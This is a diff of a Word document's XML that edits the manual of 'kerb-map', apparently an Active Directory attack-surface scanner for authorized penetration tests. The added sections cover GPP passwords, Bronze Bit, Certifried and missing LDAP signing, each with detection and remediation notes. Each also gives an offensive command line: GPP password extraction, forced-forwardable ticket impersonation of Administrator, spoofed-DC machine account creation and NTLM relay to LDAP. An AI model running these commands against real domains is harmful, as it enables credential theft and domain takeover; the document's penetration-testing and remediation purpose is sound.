-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -4217,40 +3135,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561343 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>23</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -4278,40 +3166,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561344 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>24</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -4324,119 +3182,6 @@
       </w:sdtContent>
     </w:sdt>
     <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc224561281"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>1</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Introduction</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="1"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>kerb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-map is an Active Directory enumeration and attack surface mapping tool written in Python. It is designed for use by penetration testers and red team operators during </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>authorized</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> engagements against Windows domain environments.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Unlike running a collection of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>impacket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> scripts manually, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>kerb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-map consolidates every Kerberos-related attack surface into a single authenticated scan and produces a ranked, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>prioritised</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hit list telling you exactly where to start and what command to run next.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:pPr>
         <w:spacing w:before="60" w:after="60"/>
       </w:pPr>
@@ -4451,24 +3196,11 @@
           <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
         </w:pBdr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc224561282"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>1.1  What</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kerb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-map Does</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkStart w:id="110" w:name="_Toc224561360"/>
+      <w:r>
+        <w:t>5.7  GPP Passwords — MS14-025</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="110"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4478,21 +3210,541 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">In a single authenticated LDAP session, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Group Policy Preferences created before KB2962486 may store passwords encrypted with a publicly known AES key. Any domain user can read SYSVOL and decrypt these passwords.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t>kerb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Detection: Queries all groupPolicyContainer objects via LDAP and checks gPCFileSysPath attributes for SYSVOL paths containing potential cpassword XML files (Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t>-map:</w:t>
+        <w:t>Remediation: Apply KB2962486, delete existing GPP XML files containing cpassword, reset affected passwords.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9360" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="120" w:type="dxa"/>
+              <w:bottom w:w="120" w:type="dxa"/>
+              <w:left w:w="200" w:type="dxa"/>
+              <w:right w:w="200" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="A8D8EA"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>Get-GPPPassword.py domain/user:pass@DC_IP</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="111" w:name="_Toc224561361"/>
+      <w:r>
+        <w:t>5.8  Bronze Bit — CVE-2020-17049</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="111"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Bypasses the S4U2Self forwardable flag validation in constrained delegation. An attacker with a constrained delegation account can impersonate any user to any service in the delegation list, even without protocol transition enabled.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Detection: Checks if constrained delegation accounts exist AND the domain functional level suggests the patch (KB4598347) has not been applied (DFL &lt; 7).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Remediation: Apply KB4598347 on all DCs, set PerformTicketSignature=2 registry key.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9360" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="120" w:type="dxa"/>
+              <w:bottom w:w="120" w:type="dxa"/>
+              <w:left w:w="200" w:type="dxa"/>
+              <w:right w:w="200" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="A8D8EA"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>getST.py -spn TARGET_SPN -impersonate Administrator -force-forwardable -dc-ip DC_IP domain/user:pass</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="112" w:name="_Toc224561362"/>
+      <w:r>
+        <w:t>5.9  Certifried — CVE-2022-26923</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="112"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Any domain user can create a machine account (if MachineAccountQuota &gt; 0), set its dNSHostName to match a DC, request a certificate, and authenticate as the DC — full domain compromise. Severity: CRITICAL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Detection: Checks three conditions via LDAP: (1) AD CS enrollment services exist, (2) ms-DS-MachineAccountQuota &gt; 0, (3) domain appears unpatched (DFL &lt; 7).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Remediation: Apply KB5014754 (May 2022 updates), set MachineAccountQuota=0, enable strong certificate mapping.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9360" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="120" w:type="dxa"/>
+              <w:bottom w:w="120" w:type="dxa"/>
+              <w:left w:w="200" w:type="dxa"/>
+              <w:right w:w="200" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="A8D8EA"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>certipy account create -u user@domain -p pass -dc-ip DC_IP -user FAKE$ -dns DC_FQDN</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="113" w:name="_Toc224561363"/>
+      <w:r>
+        <w:t>5.10  LDAP Signing Not Required</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="113"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>If LDAP signing is not enforced on the DC, NTLM relay attacks to LDAP are possible (ntlmrelayx, mitm6, Responder). This enables privilege escalation via RBCD or delegation abuse. Severity: HIGH.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Detection: Checks whether the current LDAP connection was established without signing (port 389 vs 636/LDAPS).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Remediation: Set “Domain controller: LDAP server signing requirements” to “Require signing” via GPO. Enable LDAP channel binding (LdapEnforceChannelBinding=2).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9360" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="120" w:type="dxa"/>
+              <w:bottom w:w="120" w:type="dxa"/>
+              <w:left w:w="200" w:type="dxa"/>
+              <w:right w:w="200" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="A8D8EA"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>ntlmrelayx.py -t ldap://DC_IP --delegate-access</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc224561281"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>1.  Introduction</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>kerb-map is an Active Directory enumeration and attack surface mapping tool written in Python. It is designed for use by penetration testers and red team operators during authorized engagements against Windows domain environments.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Unlike running a collection of impacket scripts manually, kerb-map consolidates every Kerberos-related attack surface into a single authenticated scan and produces a ranked, prioritised hit list telling you exactly where to start and what command to run next.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc224561282"/>
+      <w:r>
+        <w:t>1.1  What kerb-map Does</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>In a single authenticated LDAP session, kerb-map:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4508,21 +3760,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Discovers every </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Kerberoastable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> account (SPN holders) and scores each by crackability</w:t>
+        <w:t>Discovers every Kerberoastable account (SPN holders) and scores each by crackability</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4538,21 +3776,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Finds every AS-REP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Roastable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> account (pre-authentication disabled)</w:t>
+        <w:t>Finds every AS-REP Roastable account (pre-authentication disabled)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4584,21 +3808,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Enumerates privileged users, stale accounts, password policy risks, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>DnsAdmins</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>, domain trusts, and LAPS status</w:t>
+        <w:t>Enumerates privileged users, stale accounts, password policy risks, DnsAdmins, domain trusts, and LAPS status</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4614,63 +3824,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Detects known CVEs and misconfigurations: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>ZeroLogon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>noPac</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>PrintNightmare</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>PetitPotam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>, AD CS ESC1-ESC8, MS14-068</w:t>
+        <w:t>Detects known CVEs and misconfigurations: ZeroLogon, noPac, PrintNightmare, PetitPotam, AD CS ESC1-ESC8, MS14-068, GPP Passwords (MS14-025), Bronze Bit (CVE-2020-17049), Certifried (CVE-2022-26923), LDAP Signing</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4702,35 +3856,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Exports </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>results</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> as JSON or </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>BloodHound</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>-compatible format</w:t>
+        <w:t>Exports results as JSON or BloodHound-compatible format</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4751,6 +3877,38 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="40" w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Audits Kerberos encryption types across all accounts and DCs — flags RC4-only and DES configurations</w:t>
+      </w:r>
